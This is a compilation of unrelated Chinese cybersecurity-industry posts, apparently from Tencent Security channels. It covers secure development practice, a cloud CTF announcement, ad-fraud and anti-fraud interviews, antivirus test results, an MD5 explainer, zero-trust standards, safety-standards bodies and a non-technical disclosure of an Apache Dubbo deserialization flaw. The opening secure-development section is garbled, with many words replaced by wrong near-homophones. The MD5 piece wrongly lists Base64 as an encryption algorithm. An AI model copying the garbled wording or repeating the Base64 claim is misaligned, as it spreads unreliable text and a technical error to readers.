为缩小利用平安问题带来的损失，以及线上平安问题整改带来的老本，须要将平安开发工作进行左移。在利用零碎需要分析阶段，就应该对利用系统软件的平安需要进行全面梳理，建设通用的平安需要，而后依据利用零碎不同的等级和业务个性差别建设基线要求和特定需要，依据岗位的差别设计不同方向的培训内容：如安全意识培训、平安技术培训、公司级平安要求宣贯等。 平安开发设计能力 在对利用零碎做概要设计、具体设计时，为了防止产品设计带来的安全隐患，防止后续发现问题对性能实现流程甚至应用软件架构大刀阔斧改变带来昂扬代价。在产品设计阶段，须要退出必要的平安设计流动：包含攻击面威逼剖析、数据流剖析、威逼建模、权限最小化、架构平安设计、性能平安设计、接口平安设计、逻辑平安设计、零碎上线部署平安设计等，通过这些设计流动和开发流程的强联合缩小利用安全隐患，晋升利用零碎线上平安能力。 平安开发编码能力 通过提供平安开发指引、制订平安编码标准、平安编译标准、提供公共安全组件对开发人员进行赋能，让其依照平安开发编码标准进行编码，并提供一套强有力的源代码平安检测零碎，对源代码做滚动安全检查，从代码编写阶段把控代码平安品质，从而从源头缩小或打消因编码谬误而产生的安全漏洞，缩小后续修复的老本。 平安开发测试能力 在软件开发生命周期中，不同阶段修复安全漏洞的老本差距十分大，研发阶段与经营阶段修复老本和危险差别微小，所以在利用零碎上线之前就修复安全漏洞效率高、危险低。➢联合企业的理论状况能够采取动态测试、动静测试、交互测试、含糊测试、人工检测等形式发现问题、修复问题；➢针对不同的业务利用建设平安测试用例、误报清理指引、品质红线品质门，原则上各项均合格达标能力公布上线；➢对于在测试中发现的和SRC通报的破绽应建设响应流程，通过可视化破绽平台对破绽进行对立治理、对立评估、对立验证。 平安开发成熟度评估能力 软件平安开发成熟度评估是一种对比性的模型，帮忙企业本身在平安开发在组织布局、技术能力、建设施行等方面掂量软件开发平安能力。通过成熟度评估，能够达到以下指标：➢评估企业在利用系统安全开发能力上的现状和程度，剖析企业平安开发能力和业界平均水平及最高程度的差距。➢依据企业的信息化和网络安全的指标，综合思考资源状况和零碎开发成熟度，布局正当的、能够实现的指标方向、将来的演进路线便于造成利用平安开发策略、阶段性指标和每年的口头计划。 欢送业内人士退出【腾讯利用开发平安技术交换群】，独特探讨利用平安开发能力和技术实际。 扫描二维码进群???? 或增加小助手微信号【Tencent-DataSecurity】 发送【利用平安开发】进群

7月11-12日，第二届GeekPwn云靶场挑战赛线上热身赛战火将重燃“云上”，再过1天就将失去了报名机会！你还不赶紧行动报名？ 产业互联网时代，"万物上云"带来诸多利好的同时，同样也面临各种网络安全威胁和挑战。继 2019 年首届云安全挑战赛之后，GeekPwn 再度联合腾讯安全云鼎实验室举办第二届极棒云安全比赛，聚焦最新云安全攻防趋势的研究和探索。 为了让大家更广泛的参与，本次线上热身赛采用CTF赛制，成熟的比赛形式考察参赛选手在实战状态下的技术实力。同时模拟云计算场景下的安全威胁，覆盖云计算“全栈”环境，更加贴近云安全面临的各种实际问题。 除了高品质赛题和丰厚奖金以外，主办方还针对云环境的安全技术特色首度增设“极限逃逸”单项奖，比赛优胜者还能得到GeekPwn证书。同时，腾讯安全还将提供特殊offer，为优秀高校选手提供进入腾讯实习的绿色通道。 本届云靶场挑战赛旨在鼓励参赛选手对云计算设施的安全研究，提升云上安全水平，探索云安全的前沿发展趋势。目前，线上热身赛报名已进入倒计时1天，并将于7月11-12日率先打响战斗。 最后，奉上线上热身赛全方位“备考攻略”，“云上”之争，等你来战！ ↓↓↓

端午节前，和大家汇报了成功护航广交会0风险0事故的好消息。这么大规模的云端展会是如何交出满分安全答卷的？ ????戳图，了解腾讯安全重保防护实录????

1、查找对应服务版本上存在的漏洞https://www.cvedetails.com/ 持续更新....

在数字营销时代，广告的曝光形态、载体、频次、受众都发生了巨大的变化。盘踞在广告行业中的黑灰产越来越多的运用技术手段伪造虚假流量，以欺诈手段攫取收益，不但影响正常的广告投放曝光效果，也会导致广告主的判断失真，无法感知到消费者的真实想法。 虚假流量的威胁始终如鲠在喉。如何通过技术的力量，借助专业的代理商和安全服务商，从源头上解决刷量，已经成为广告主的普遍诉求。 由腾讯安全联合云+社区打造的「产业安全专家谈」第二十二期，邀请到腾讯安全天御流量风控研发负责人Bink，为大家揭秘广告刷量背后的攻防实战经验，在另一个视角起底虚假流量，并通过大数据、AI等技术手段给出“解题之法”。 Q1：当前广告行业黑产作弊的情况发展如何，对广告主会产生什么样的影响？ Bink：虚假流量的起因主要是来自于广告主或者客户KPI设定太严格，比如说要求高的曝光、高的点击，甚至要求后端高的付费转化所带来的这样一个要求，会让需求方去找黑产来进行刷量来满足这个诉求，这种情况下就会造成虚假流量的产生。 根据腾讯安全的分析，现在的黑产团伙从事广告刷量大概有300万人左右。他们现在主要都是以小规模的团伙在作案，造成的广告损失大概有200亿左右。最近这几年慢慢的网红经济起来了， KOL也带得比较火，黑产也会去盯着这些KOL创意视频的刷量，这也会对广告主跟广告平台带来一种比较恶性的影响，给广告主带来很大的经济损失。 Q2：相较于广告主和媒体，广告平台在数字营销中扮演什么角色，受到黑产和虚假流量的影响有多大？ Bink：它是一个中间的角色，会去找好的流量来为广告主去服务，帮广告主带来更好的人群，带来更好的转化。如果它当前收到的流量大部分都是假量，就会导致给广告主带来的效果变差，它自己要去承担这里面的损失。所以说它也需要有这种服务帮他去做过滤，过滤完之后能帮它去做广告效果的优化。 Q3：目前黑产刷量的主要的手段是什么，针对的场景有哪些？ Bink：其实黑产是一个有组织的团伙，从基础的买服务器、买手机卡之类的支撑，到后面的养号，再到实际的刷量实施，它是一个流程。 在与黑产的对抗过程当中，黑产的技术也在迭代，总结之后大概分成三类，假机、假人、假动机。所谓的假机就是说，它当前的设备是虚拟出来的，比如说模拟器。有两种比较典型的，一种就是协议刷，它其实是破解了广告的监测代码的协议，往接口里面不断的刷请求，会导致监控的曝光量急剧增加，造成曝光虚高，这样会浪费广告主曝光的费用；另外一种，直接用安卓的模拟器去模拟出很多手机，再用这个手机去刷量，这种就是模拟刷。 第二个阶段就是真机假人，这个阶段主要是因为随着广告主、平台方开始使用风控的服务之后，发现第一阶段的虚拟机的识别相对比较容易，所以就会迫使黑产去买各种廉价的手机，用群控软件操纵这些手机去完成真实曝光、点击、下载。 随着第三方风控服务商的介入，比如说像天御团队服务的介入，黑产的手法就会被识别出来，对抗就会越来越严重，他们被迫会去升级他们的手段，之前用的都是机器之类的，他们就会改成用真人，通过网站平台去分发各种刷量任务出去，让四五线城市的羊毛党去帮他去做点击、下载，甚至转化购买等等。这种的成本相对会高一点，但是它的识别难度也会加大。这是比较典型的三个阶段。 Q4：通过目前互联网技术手段的引入能否解决现有的虚假流量问题，解决方案是什么？ Bink：大数据加AI风控能有效缓解这种虚假流量，或者无效流量这样一个问题。现在在行业里大部分的广告审计主要还是以第三方的审计服务为主，主要是来监控当前的曝光量、点击量和一些事后的虚假流量分析。而现在做事前Pre-bid虚假流量识别相对少，而且大部分都是需要嵌入SDK的，所以对于媒体方来说其实是不太容易去接受这种方式的，这是它的问题所在。 而这次我们腾讯安全天御联合兄弟团队腾讯防水墙、携手电通安吉斯，推出了一个流量质量优化的方案，主要提供的就是一个Pre-bid的虚假流量的过滤，提高流量质量的方案。它的特点有几点，第一点，我们这种方案是做Pre-bid的，就是做事前的风控过滤，它是无需嵌入SDK的，而且它也能适用于事前、事后的虚假流量的过滤审计，使用比较简洁。 另外一个特点就在于我们会有很多黑产情报的这样一个服务支撑，通过黑产情报我们就可以去挖掘出当前广告行业的黑产使用手法，来反哺到线上，优化我们的风控服务。第三块，其实我们还有一个案件分析的能力。针对服务的广告主，最近识别出来的恶意情况，我们可以帮它去分析它在多个渠道买量的虚假流量情况。 比如，我们最近在帮某一个快消品客户去做流量质量优化的时候，发现它有几个渠道的无效流量比例特别高，而且是开屏广告的比例特别高，高到70%左右，我们发现之后进行了一个案件分析、黑产情报的挖掘，发现其实它的曝光刷量其实是被动刷。 所谓的被动刷，是因为它的渠道是来自于APP的开屏广告，而刚好这几个APP最近在做APP下载的推广活动，还有一些APP刷榜的活动，黑产在刷APP的同时，会帮它把APP下载安装，并打开这个APP，就触发了这个广告的曝光，所以说对于广告主来说，它的广告是被动刷的，受牵连导致的这种刷量。广告主知道这个情况之后，及时地去调整了买量渠道的组合跟筛选，避免了虚假流量问题。 Q5：刷量黑产打法不断升级，品牌如何建立动态的防御能力？ Bink：我们主要提供的是一个比较简洁的风控SaaS服务，它虽然简单，但背后其实是有很多技术的，比如这里的风控,我们会从几个方面来做，从终端、环境、行为，多个维度来进行风控的判断。其次，我们也会去结合黑产情报的挖掘、威胁情报的挖掘分析，结合腾讯安全累积下来十几年的风控经验来进行黑产对比。 随着黑产的升级，我们也提出了一些新的手法，比如用基于生成对抗的框架，来进行黑产手法的挖掘，自动识别出黑产的手法，主动防御，由被动转成主动。随着黑产的对抗，我们需要多联合、多元的协同合作，所以去年天御加入中国无线营销协会，一起去跟广告主、平台方、广告行业的技术公司去探讨GIVT、SIVT这种无效流量的各种标准跟规范。因为我认为广告行业流量质量的优化提升其实是一个长久的事情，是需要多方进行配合，才能做一个比较巨大的工程。

日前，国际权威反病毒评测机构Virus Bulletin公布了6月的VB100测试结果，腾讯安全旗下的腾讯电脑管家（英文版）以100%通过率、0误报的优秀成绩位居榜首，截至目前，腾讯安全已连续获得41次认证，再次刷新连续通过记录，持续领跑国际杀毒软件安全能力。 （图：腾讯电脑管家（英文版）连续41次通过VB100测试认证） VB100测试评测在业内素有“安全界奥林匹克”之称，要求十分严格，只有通过和不通过两种结果。作为一家非官方的国际权威反病毒认证机构，VB100旨在对市场中的反病毒软件产品的查杀能力进行独立公正的比较与检测，希望通过自己的独立检测，能够帮助消费者和厂商直观地鉴别出反病毒产品的病毒防护率和扫描速度。在此次认证测试中，主办方依旧采用Windows 7和Windows 10两种系统环境测试模式，来自ESET、AVG Internet Security等38家安全厂商的44款产品参测。最终，腾讯安全旗下的腾讯电脑管家（英文版）以100%通过率，0误报的成绩通过测试。 自2012年参评以来，腾讯安全已连续获得41次认证，离不开腾讯安全自主研发TAV反病毒引擎的加持。据了解，TAV反病毒引擎凝聚着腾讯安全多年来同恶意软件对抗的经验，具备高性能、高检出、高处理能力、低消耗等技术特点，极大地提升了腾讯安全旗下终端安全产品的杀毒能力，护航亿级用户的终端安全。 作为TAV杀毒引擎所属的安全技术研究机构，腾讯安全反病毒实验室以自研TAV引擎为核心，打造了以T-Sec终端安全管理系统、腾讯电脑管家、腾讯手机管家、Linux管家为代表的终端安全产品，以哈勃分析系统为核心的防APT邮件网关、高级威胁检测系统等病毒防御工具，以及以TAV云为核心的大数据分析系统、威胁情报系统等漏洞检测工具，构建起了事前、事中、事后的全网安全防御体系，帮助个人及企业用户全方位对抗病毒、黑产等各种类型的网络安全威胁。 随着5G、AI、云计算等新兴技术的普及，加速产业互联网发展的同时，也给安全防护带来新的挑战。腾讯安全将依托于过去20多年服务10亿级用户与海量业务的安全经验、云管端一体化全域安全基础、联合实验室专家团队及攻防实力，在守护个人用户网络安全的同时，持续打造产业安全防御体系，随时应对各类网络突发事件，护航政企用户核心数字资产及业务安全。

前言MD5 是程序开发中非常常用的一种算法，很多人都用过。MD5算法最常用的一个场景就是用户注册，密码进行MD5加密，密码无法反向解密可以提高安全性。但 MD5 到底是加密吗？所谓的加密到底是什么意思？ 先说结论，MD5 只是一种哈希算法，不算真正的加密算法。那么问题来了，到底啥才是加密？ 加密是什么？加密，指的是对数据进行转换以后，数据变成了另一种格式，并且除了拿到解密方法的人，没人能把数据转换回来。因此，加密通常用于网络通信。因为网络上的通信数据，任何人都有可能会拿到，把数据加密后再传送，送达以后由对方解密后再查看，就可以防止网络上的偷窥。例如大家都知道「安全」但很少人知道「为什么安全」的 HTTPS，就是通过加密算法来保障的网络安全性。 加密算法的目的，在于别人无法成功查看加密后的数据，并且在需要的时候还可以对数据进行解密来重新查看数据。哈希算法哈希算法，即 hash，又叫散列算法，是一类把任意数据转换为定长（或限制长度）数据的算法统称。 例如我叫张三，你叫李四，那么「人 -> 人名」的算法就叫属于一种哈希算法。哈希算法通常用于制作数字指纹，数字指纹的意思就是「你看到这个东西就像看到原数据一样」 例如我们在一些网站下载大文件的时候，网站提供给我们验证文件完整性的 MD5 或者 SHA1 码，就是原文件的哈希值。哈希算法有很多种，MD5 是其中的一种，这就是 MD5。所以，优秀的哈希算法通常需要具有低碰撞概率（即不同数据的哈希值通常也不一样）。 不可逆加密MD5 算法是一种哈希算法，哈希算法的设计目标本身就决定了，它在大多数时候都是不可逆的，即你经过哈希算法得出的数据，无法再经过任何算法还原回去。所以，既然不能将数据还原，也就不能称之为可以解密；既然不能解密，那么哈希的过程自然也就不能称作是「加密」了。 结论MD5 只是一种哈希算法，不算真正的加密算法 延申我们平常开发中接触形形色色的加密算法，简单来说分为 对称加密算法：加密算法与解密算法的秘钥key一致。非对称加密算法：加密算法与解密算法的秘钥不一致。散列算法：没有秘钥，目前无法反向解密。(暴力破解除外)常规加密算法：DES加密算法、AES加密算法、RSA加密算法、Base64加密算法、XXXTEA加密算法，等等。其中MD5和SHA-1都是哈希，散列算法，严谨来说不算加密算法 参考传送门 门送传

6月24日，在中国产业互联网发展联盟标准专委会指导下，腾讯联合零信任领域共16家机构企业，共同成立国内首个“零信任产业标准工作组”， 覆盖产、学、研、用四大领域，推动零信任系列团体标准的研究、研制与产业化落地，提高零信任技术的应用效率。 同时，腾讯正式发布自研零信任安全管理系统iOA（简称腾讯iOA）5.0版本，为护航企业办公安全提供更优质的标准化服务。 零信任产业标准工作组成立 牵引零信任产业规范发展 后疫情时期，远程协同办公成为企业运营开源节流、提升效率的新模式，对于如何保障办公的协同、效率、安全和体验，“零信任无边界”的安全理念在实践应用中得到进一步的认可。中国产业互联网发展联盟秘书长雷晓斌指出：“零信任产业发展需要具有先进性、前瞻性的标准去牵引，才能真正成为网络安全发展的驱动力。” 为了助力企业在网络安全防护中落地“零信任”，腾讯联合国家互联网应急中心、中国移动通信集团设计院、天融信、中国标准化研究院、公安部第三研究所、任子行、西安邮电大学、顺丰集团、完美世界、蔷薇灵动、上海观安、知道创宇、深圳市网安计算机安全检测技术有限公司、芯盾时代等16家发起单位，在中国产业互联网发展联盟标准专委会下建立“零信任产业标准工作组”，以标准化为纽带连接零信任产业需求挖掘、技术研发、技术标准研制以及推广应用等工作，为政企客户提供标准化、规范化、具备指导意义的标准文件、研究报告、优秀零信任产品和解决方案等专业服务，为成员单位提供技术交流、专家指导、市场开拓、产品测评、人才培养等专业平台。 零信任产业标准工作组的成立，也有利于帮助各行业用户基于标准化的方式来评估其安全态势，建立真正有效的网络安全架构，最终提升行业的整体安全水平与企业竞争力。 共建零信任产业标准生态 加速产业数字化转型 作为“零信任产业标准工作组”筹备成员，腾讯是国内最早探索零信任应用的企业之一，致力于探索零信任安全解决方案，并从2016年起在公司内部率先实践，自研腾讯iOA已经过腾讯60000+员工、100000+服务桌面终端实践验证，尤其在2020年疫情防控期间，很好地解决了腾讯员工及合作企业的远程办公问题。企业如何应用零信任iOA保障办公安全？ 在零信任标准制定方面，腾讯已经走在前列： 2019年由腾讯牵头提案的“零信任安全技术-参考框架”行业标准，是国内业界首个零信任安全技术行业标准；同年主导的“服务访问过程持续保护参考框架”国际标准，在瑞士日内瓦举办的ITU-T(国际电信联盟通信标准化组织) SG17安全研究组全体会议上成功立项，是国际上首个零信任安全相关的技术标准，对于推动全球零信任技术商用进程意义重大。目前，腾讯iOA正式发布5.0版本，可助力企业打造员工无论位于何处(Anywhere)、何时(Anytime)使用何设备(Any device)都可安全地访问授权资源以处理任何业务（Any work）的新型“4A办公”方式，并在政府、金融、医疗、交通等多个行业领域应用落地，助力降低不同业务场景风险，保障远程协同办公的安全和体验。

6月24日下午，第127届广交会正式落下帷幕。 50个展区、近2.6万家参展商“云上”参展，数十万来自全球的采购商成功在“线上”做成了生意。而在这十天时间内，腾讯安全为本届广交会交出一份亮眼的安全“重保”成绩单： 广交会重保期间，腾讯安全共拦截超百万次各类安全攻击图片/文本/音频风险检测数近十亿条最终确保 0安全风险，0安全事故！================== 出色的重保成绩，也获得了公安机关的认可。10x24的坚守，一切都值得！ 为了保障广交会顺利开展，腾讯安全重保团队在展会开幕前2个月就投入到整个广交会的安全建设中，进行了大量的风险评估、漏洞测试与攻防演练等工作，以排查潜在安全风险；在展会期间，超过100多名安全专家投入到广交会的安全保障工作中，24小时不间断值守，以确保万无一失。 广交会虽然结束了，但云上展会已然成为潮流。 腾讯安全重保防护，即将奔赴下一站。

标准机构 Standards Body 起草标准的人通常高度关注怎么定义最佳过程实践(Best Practice)，而常常忽视一个问题“遵循标准的人如何向别人证明，我开发的产品是安全的这个问题”。并不是说，我们遵循了一些预先设计好的开发过程，那些所谓的最佳实践，就能证明我们开发的产品是安全的。我们需要通过评估危害(assess hazards)，设计减轻(mitigation hazards)这些危害的手段，最终剩下那些可以接受(acceptable)的残余危害(residual hazards)的方式来向他人证明我们的产品安全。 对于标准来说，如果你不喜欢，你总能够找到替代标准。很难说的清楚到底有多少种与功能安全相关的标准(safety sthandards)，可能会有几百种。为什么这么说，是因为安全相关的标准(safety sthandards)没有明确的边界定义（no clear boundary），像IEC 29119这种涉及到软件测试的标准，就很难说的清楚它是否是安全相关的标准。 有很多组织在发布标准，后续更新的汽车电子开发文章中的参考标准主要来自于两个标准化组织，一个是国际电工委员会(International Electrotechnical Commission)IEC另外一个是国际标准组织（International Organization for Standards)ISO，同时会涉及一些欧洲电工技术标准化委员会(European Committee for Electrotechnical Standardization )CENELEC的标准。IEC和ISO都在瑞士的日内瓦办公，尽管，每个组织都会发布自己的标准，但是，还有一些标准是联合发布的。比如系统架构描述标准42010就是这样的标准，它使用混合前缀(prefixes)ISO/IEC/IEEE（ISO/IEC/IEEE 42010）。CENELEC在比利时的布鲁塞尔主要负责欧洲地区的电气工程标准起草。尽管CENELEC是一个欧洲标准组织（前缀EN），但是，它起草的铁路系统安全标准在全世界范围内使用广泛。 IEC，ISO，CENELEC不像互联网工程任务组(Internet Engineering Task Force)IETF和分布管理任务组（Distributed Management Task Force ）DMTF一样按照标准收费，而是按照看标准的人头来收费。一般IEC61508标准的英文版一个单人授权（ single-user license ）是3000美元，大约4.5美元每页（670页），注意这只是给一个用户来用的授权License，理论上，如果一家公司有多人需要读这份标准的话，必须按照人数来买授权license。 有很多互联网站点可以提供24小时标准访问服务，这种通常只需要几美元就可以看到完整标准，这种一般只适合简单了解一下标准，而不是拿到完整备份重复使用。 IEC和ISO的这种标准授权方式，偶尔会遇到一种奇葩情况。比如，一个公司的工程师通过采购部门买了一份单人授权（ single-user license ）标准，结果买回来的标准上每一页都打着采购的名字，理论上，这份标准只有采购能看，工程师是无权看这份标准的。 ISO和IEC的这种收钱方式经常被批，因为，它使小公司获取“合法”的标准十分困难。很多人建议ISO和IEC免费提供标准，然后，从执行标准的过程中收费：每当认证机构根据标准颁发认证的时候，才收取版税。这样不但利于标准普及，也能够推动标准化组织发布更多有用的标准，因为越多人用标准，标委会收入越高。然而，这种方式也存在利益冲突的问题，通常要求标委会不能参与认证过程，不能一个人既参与考试又要监考。 上面三个标委会的标准制定过程基本上是一样的，行业专家们创建一个标准，标准能否通过取决于标委会参与国的投票结果。IEC和ISO标准投票过程中，大家都是平等的，每个国家一票（中国、美国、德国各一票，蒙古、不丹、拉夫堡也是各一票）。但是CENELEC的投票是有权重的（德国、法国、英国比冰岛有更大的权重）。 如果想参与标准投票，工程师必须参加本国的标准化组织比如德国的DIN，美国的ANSI，我们国家的国标委。 认可Accrediation 与 认证Certification 产品认证（Product Certification）\ 过程认证(Process Certification) 一个公司希望它的产品(Product)或者过程(Process)能够按照某个标准进行认证(Certification)，通常有两种方式，一种是自己声明（self-declare）它的产品(Product)或者过程(Process)满足该标准的全部要求(meets all the requirements)，然后找另外一家外部的公司来确认自己的声明（confirm the declaration）。另一种是雇佣一个认证机构(Certification body)来认证(certify)自己的产品(Product)或者过程(Process)。 认证机构(Certification body)的认可Accrediation 原则上，任何公司都可以作为认证机构(Certification body),不过，有些公司可以得到认可（Accrediation）来针对某些标准进行认证(Certification)。被认可（Accrediation）的认证机构(Certification body)提供的标准认证(Certification)比非认可认证机构(Certification body)的认证(Certification)具有更高的商业价值（公信力更好).认证机构(Certification body),的认可（Accrediation）一般都是由所在国的认监委（Accrediation Authority）来进行。比如，一个认证机构(Certification body)可以被认可（Accrediation）根据IEC61508执行最高SIL2等级的硬件安全产品认证。所以，一般公司寻找认证机构(Certification body)合作时，一定要检查候选认证机构(Certification body)被认可(Accrediation)的等级来保证最终执行的认证(Certification)可信且具有更高的商业价值。 ...

6月23号，开源框架Apache Dubbo披露了一项默认反序列化远程代码执行漏洞（CVE-2020-1948）和相应的修复方案。该漏洞由腾讯安全玄武实验室研究员于去年11月首次提交。 Apache Dubbo擅长处理分布式和微服务系统远程调用。据Apache 官方信息显示，包括阿里巴巴、网易云音乐、去哪儿、中国人寿、中国电信、当当网、滴滴出行、海尔和中国工商银行等在内的150多家企业使用该框架进行分布式系统和微服务集群的构建。此次漏洞被定义为高危漏洞，攻击者可以发送未经验证的服务名或方法名的RPC请求，同时配合附加恶意的参数负载。当恶意参数被反序列化时，它将执行恶意代码。理论上所有使用这个框架开发的产品都会受到影响，可能会导致不同程度的业务风险，最严重的可能导致服务器被攻击者控制。 目前Apache Dubbo已经发布了2.7.7版本，并通知开发者通过升级新版本来规避该漏洞的影响。腾讯安全玄武实验室建议，因无法直接通过与该服务交互来判断Dubbo的版本，建议用户通过排查Dubbo所使用的注册中心（如zookeeper、 redis、nacos等）中所标示的Dubbo服务端版本号来确定，由此来做对应的防护以及修复处理。腾讯云防火墙、腾讯T-Sec主机安全（云镜）、腾讯T-Sec高级威胁检测系统（御界）也已发布了检测工具，帮助开发者展开安全自查。 上个月，腾讯安全玄武实验室发现了开源JSON解析库Fastjson 存在远程代码执行漏洞，autotype开关的限制可被绕过，然后链式地反序列化某些原本是不能被反序列化的有安全风险的类。该漏洞被利用可直接获取服务器权限，被官方定级为高危安全漏洞。6月初，Fastjson已经发布了新版本，修复了该漏洞。 腾讯安全玄武实验室被行业称为“漏洞挖掘机”，已经发现并协助国内外知名企业修复了上千个安全问题，对外报告的漏洞中，仅有CVE编号的就超过800个，2015年针对条码阅读器的安全研究成果“BadBarcode”、2016年针对微软网络协议的研究成果“BadTunnel”、2017 年针对移动应用的研究成果“应用克隆”、2018年针对屏下指纹验证技术的研究成果“残迹重用”都曾经在业内引发广泛的关注。凭借输出的漏洞研究报告，玄武实验室连续多年在国家信息安全漏洞共享平台原创积分榜上位居第一。

近日，全球权威信息技术研究和顾问公司Gartner发布了《在线反欺诈市场指南》，对现阶段全球的在线反欺诈全链路监测与防护能力进行了分析，同时对全球顶级的反欺诈服务商进行了分级推荐，腾讯云天御（TenDI）智能风控服务入选并被Gartner评为了“银行级Banking Focus（最高级别）”金融风控能力代表。由腾讯安全联合云+社区打造的「产业安全专家谈」第二十一期邀请到了腾讯安全业务安全总监、天御智能风控研发负责人王翔，分享腾讯云天御（TenDI）智能风控服务获得认可的缘由，以及金融反欺诈的一线实战经验。 Q1：腾讯云天御（TenDI）智能风控服务为什么能在Gartner发布《在线反欺诈市场指南》报告中被评定为银行级（最高级）？ 王翔：本次Gartner发布《在线反欺诈市场指南》的主旨是在帮助企业决策者了解反欺诈产品的最新动向和最新挑战的同时，了解如何让反欺诈的产品更好的去解决自身的业务需求，并对全球在线反欺诈厂商能力进行评估，对于全球企业采买产品具备很强指导的意义。 腾讯云天御（TenDI）智能风控服务，依托于腾讯过往二十余年所积累的黑灰产对抗经验和大数据人工智能技术打造而成，旨在帮助企业解决各种各样在线欺诈问题。2017年以来，腾讯云天御（TenDI）智能风控服务已经服务了16个不同行业，7000多家客户，目前日均服务量已经超过了2000亿次，累计守护了超过1万亿的业务资金。 此外，腾讯云天御团队还牵头制定了首个国家（GB）、国际（IEEE）大数据风控标准，助力产业互联网智能化转型。正是这样亮眼的成绩，才让腾讯云成为了本次唯一入选该报告的中国厂商，而腾讯云天御（TenDI）智能风控服务则被评定为具备银行级的反欺诈能力，与国际的知名的金融风控巨头并列。 Q2：什么是在线欺诈？哪些行业是在线欺诈的重灾区？ 王翔：线上业务的正常逻辑被滥用，从而导致企业和用户资金产生损失的行为，都可以被归入在线欺诈的范畴。目前金融行业是在线欺诈的重灾区，以银行的在线信贷为例，很多黑产会使用被泄露的个人信息冒充用户申请线上信贷，导致金融机构遭受大额损失。 除金融行业外，电商和零售行业也深受在线欺诈的危害。这些行业会在线上投放大量的广告和活动资源吸引消费者的关注和购买，但在遭受黑产的恶意刷量和恶意薅取后，不仅活动无法达到预期效果，大部分营销资源和活动福利都落入了黑产的口袋中，让企业和用户都因此蒙受了不少损失。 Q3：现阶段在线欺诈共分为几种？未来会对企业产生哪些影响？ 王翔：目前越来越多的企业也开始在做数字化的转型，很多企业都会碰到在线欺诈的问题，我们认为不管什么类型的企业，一般来说碰到的欺诈主要就是分为四种，分别是金融欺诈、内容欺诈、流量欺诈以及身份欺诈。 以现阶段的情况来看，黑产欺诈问题的严峻性和企业的投入存在着很大的矛盾。Gartner在报告中明确指出，到2023年全球将有30%的银行与数字商务企业拥有自己的安全风控团队，但目前这个比例仅为5%；同时，保险及医疗行业使用应对在线欺诈服务的比例也将从目前的5%上升到20%。 不难看出，未来第三方欺诈检测服务将被越来越多的企业所重视，企业也会开始着力解决在线欺诈的问题，第三方欺诈检测服务应用覆盖将从25%提升至75%或以上。 Q4：腾讯云天御智能风控服务为什么将银行级反欺诈能力作为目标？ 王翔：反欺诈的重点是对各种各样的业务操作行为进行风险判定，其中银行业对于业务合规性和效率往往有很高的要求，对反欺诈产品也有私有化部署的要求，而私有化对产品性能、效果、灵活性、适配性、稳定性等各维度的要求都是非常高的。既然银行业在所有行业中要求最为严苛，腾讯云天御智能风控服务能够符合银行的要求，就意味着能够更好地应用在其他的行业里。 Q5：腾讯云天御智能风控服务都有哪些功能？在帮助企业应对在线欺诈时有哪些优势？ 王翔：腾讯云天御智能风控服务打造了私有化的智能风控中台，可应对主流的业务安全风险，并适用于多个行业，不仅限于私有化的产品。天御智能风控服务中提供了四位一体的产品矩阵——天御智能风控中台，其中的核心部分就是私有化风控中台、云端风控中台、风控解决方案和专家咨询服务。 私有化和云端风控中台都是从腾讯自有业务的风控体系结合行业经验演变而来的，具有很强的自适应风险对抗能力及大规模数据实时运算能力。这两个都严格按照“事前风险提前感知”、“事中风险精准决策”、“事后案件全面调查”三重架构设计，同时结合具备腾讯特色的“风险探针、可信关系、智能核身”等独家风控模块，能够形成完备的风险防控闭环。 天御智能风控中台还能通过AI算法实现智能风控决策，极大减少企业对于风控策略规则的维护成本和运营成本。此外，天御智能风控中台还引入了联邦学习技术，能够让云端中台与私有化中台在黑产模型上实现快速联动，打破信息孤岛，从而实现卓越的风险判定效果。 Q6：目前腾讯云天御智能风控服务有哪些成功合作的案例？ 王翔：在过往的合作中，腾讯云天御智能风控中台曾助力中国银行构建了交易风控引擎，大幅提高了客户对于恶意交易的检出效率，通过天御智能风控中台识别的高危交易已超过百亿元规模。 借助天御智能风控中台卓越的风控能力，华夏银行的小微企业普惠金融信贷平台实现了三分钟高速放款的功能。截止2020年5月，已累计服务了5万家小微企业客户，将风控水平提升至了业内领先的水平。 此外，天御智能风控服务还助力蒙牛、东鹏等零售厂商解决了线上营销活动欺诈的问题，预计每年帮助这些客户节省超过千万级的营销费用。 在线欺诈已经成为各行各业都需要面对和解决的难题。根据Gartner调查显示，反欺诈已经从最初的电子交易环节,扩大到包括注册登录、申请和盗号的预防,并逐渐应用到银行、保险、医疗、零售、游戏等行业。这意味着提供在线反欺诈服务的供应商需要具备更加全面的风控能力。 未来，欺诈与反欺诈将会是全方位和全流程的对抗。基于过去20年多年的经验沉淀，腾讯安全将继续打磨技术、攻防等方面的能力，增加人才和生态等维度的投入，持续对产品进行优化，助力客户更加高效地解决在线欺诈问题。

继联合发布主机安全产品之后，腾讯安全和青藤云安全近期合作再次升级。此次合作，将以腾讯安全提供的年度大型攻防实战方案为基础，以青藤全方位客户服务为支撑，助力行业客户更好地完成大型攻防实战演练。 当前，随着云计算、大数据等新技术的广泛应用，越来越多的企业实现数字化转型。与此同时，网络安全边界更加模糊，传统基于网络或设备边界的安全防御技术难以应对新技术所带来的各类挑战。 为更好实现安全产品之间的协同联动，让安全更有效，从而为行业客户提供更高效的安全解决方案，腾讯安全与青藤云安全进一步加强合作，以腾讯安全20多年来深厚的安全能力积淀为依托，结合青藤云安全在主机安全方面的卓越服务，联合推出年度大型攻防实战方案。方案核心产品包括腾讯安全运营中心、腾讯安全网络入侵防护系统、腾讯安全高级威胁检测系统、腾讯安全终端安全管理系统等。 图：大型攻防实战方案架构 在当前基础设施全面云化，安全运营日益复杂的情况下，该方案通过大数据智能分析、安全治理、实时威胁检测和高效杀毒等功能，助力企业实现纵深防御。在大型攻防演习、业务上线、企业IPO前后等重保时刻，为企业提供全方位的安全防护。 未来，青藤云安全和腾讯安全将根据双方业务的多样化发展及各自的行业洞见，深化合作水平，为行业用户提供持续的安全监控与分析能力，以及快速响应能力，为促进中国网安事业的快速发展携手共行。 青藤云安全： 青藤云安全是专注于主机自适应安全的创新型科技公司。公司以服务器安全为核心，采用自适应安全架构，将预测、防御、监控和响应能力融为一体，构建基于主机端的安全态势感知平台，为用户提供持续的安全监控、分析和快速响应能力，帮助用户在公有云、私有云、混合云、物理机、虚拟机等多样化的业务环境下，实现安全的统一策略管理， 有效预测风险，精准感知威胁，提升响应效率，全方位保护企业数字资产的安全与业务的高效开展。

